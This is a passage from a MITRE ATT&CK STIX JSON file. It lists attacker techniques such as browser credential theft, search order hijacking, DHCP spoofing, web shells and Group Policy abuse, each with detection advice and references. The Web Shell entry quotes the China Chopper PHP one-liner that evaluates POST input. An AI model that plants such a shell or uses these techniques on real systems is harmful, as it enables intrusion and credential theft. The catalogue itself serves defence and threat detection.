Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "created": "2020-02-12T18:57:36.041Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/003", "external_id": "T1555.003"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Microsoft CryptUnprotectData April 2018", "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.", "url": "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata"}, {"source_name": "Proofpoint Vega Credential Stealer May 2018", "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.", "url": "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign"}, {"source_name": "FireEye HawkEye Malware July 2017", "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html"}, {"source_name": "GitHub Mimikittenz July 2016", "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.", "url": "https://github.com/putterpanda/mimikittenz"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Path Interception by Search Order Hijacking", "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Stefan Kanthak"], "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["Administrator", "SYSTEM", "User"], "x_mitre_permissions_required": ["Administrator", "User", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "created": "2020-03-13T17:48:58.999Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/008", "external_id": "T1574.008"}, {"source_name": "Microsoft CreateProcess", "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-us/library/ms682425"}, {"source_name": "Windows NT Command Shell", "description": "Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.", "url": "https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120"}, {"source_name": "Microsoft WinExec", "description": "Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-us/library/ms687393"}, {"source_name": "Microsoft Environment Property", "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.", "url": "https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Defacement", "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "created": "2019-04-08T17:51:41.390Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1491", "external_id": "T1491"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-12-14T16:28:24.680Z", "name": "Unused/Unsupported Cloud Regions", "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Netskope"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761", "created": "2019-09-04T14:35:04.617Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1535", "external_id": "T1535"}, {"source_name": "CloudSploit - Unused AWS Regions", "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.", "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "DHCP Spoofing", "description": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nDHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: \n\n1. The client broadcasts a `DISCOVER` message.\n\n2. The server responds with an `OFFER` message, which includes an available network address. \n\n3. The client broadcasts a `REQUEST` message, which includes the network address offered. \n\n4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.\n\nAdversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.\n\nDHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.\n\nRather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network\u2019s DHCP allocation pool. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Alex Spivakovsky, Pentera", "Andrew Allen, @whitehat_zero"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which specify that the IP allocations are low or have run out; these EIDs may indicate a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "created": "2022-03-24T19:30:56.727Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1557/003", "external_id": "T1557.003"}, {"source_name": "rfc2131", "description": "Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.", "url": "https://datatracker.ietf.org/doc/html/rfc2131"}, {"source_name": "new_rogue_DHCP_serv_malware", "description": "Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.", "url": "https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/"}, {"source_name": "rfc3315", "description": "J. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.", "url": "https://datatracker.ietf.org/doc/html/rfc3315"}, {"source_name": "dhcp_serv_op_events", "description": "Microsoft. (2006, August 31). DHCP Server Operational Events. Retrieved March 7, 2022.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)"}, {"source_name": "solution_monitor_dhcp_scopes", "description": "Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.", "url": "https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/"}, {"source_name": "w32.tidserv.g", "description": "Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.", "url": "https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:05.776Z", "name": "Execution through API", "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Process: OS API Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0871", "external_id": "T0871"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "AppleScript", "description": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1155", "external_id": "T1155"}, {"source_name": "Macro Malware Targets Macs", "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-02-26T14:21:37.818Z", "name": "Remote Service Session Hijacking", "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "created": "2020-02-25T18:26:16.994Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1563", "external_id": "T1563"}, {"source_name": "RDP Hijacking Medium", "description": "Beaumont, K. (2017, March 19). RDP hijacking\u200a\u2014\u200ahow to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6"}, {"source_name": "Breach Post-mortem SSH Hijack", "description": "Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.", "url": "https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-30T21:01:53.857Z", "name": "Binary Padding", "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Martin Jirkal, ESET"], "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Signature-based detection"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "created": "2020-02-05T14:04:25.865Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/001", "external_id": "T1027.001"}, {"source_name": "ESET OceanLotus", "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"}, {"source_name": "Securelist Malware Tricks April 2017", "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/"}, {"source_name": "VirusTotal FAQ", "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", "url": "https://www.virustotal.com/en/faq/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:45:06.434Z", "name": "Web Shell", "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Arnim Rupp, Deutsche Lufthansa AG"], "x_mitre_deprecated": false, "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "Network"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "created": "2019-12-13T16:46:18.927Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505/003", "external_id": "T1505.003"}, {"source_name": "NSA Cyber Mitigating Web Shells", "description": " NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.", "url": "https://github.com/nsacyber/Mitigating-Web-Shells"}, {"source_name": "volexity_0day_sophos_FW", "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"}, {"source_name": "Lee 2013", "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html"}, {"source_name": "US-CERT Alert TA15-314A Web Shells", "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Group Policy Modification", "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Itamar Mizrahi, Cymptom", "Tristan Bennett, Seamless Intelligence"], "x_mitre_deprecated": false, "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "created": "2020-12-28T21:50:59.844Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1484/001", "external_id": "T1484.001"}, {"source_name": "Mandiant M Trends 2016", "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.", "url": 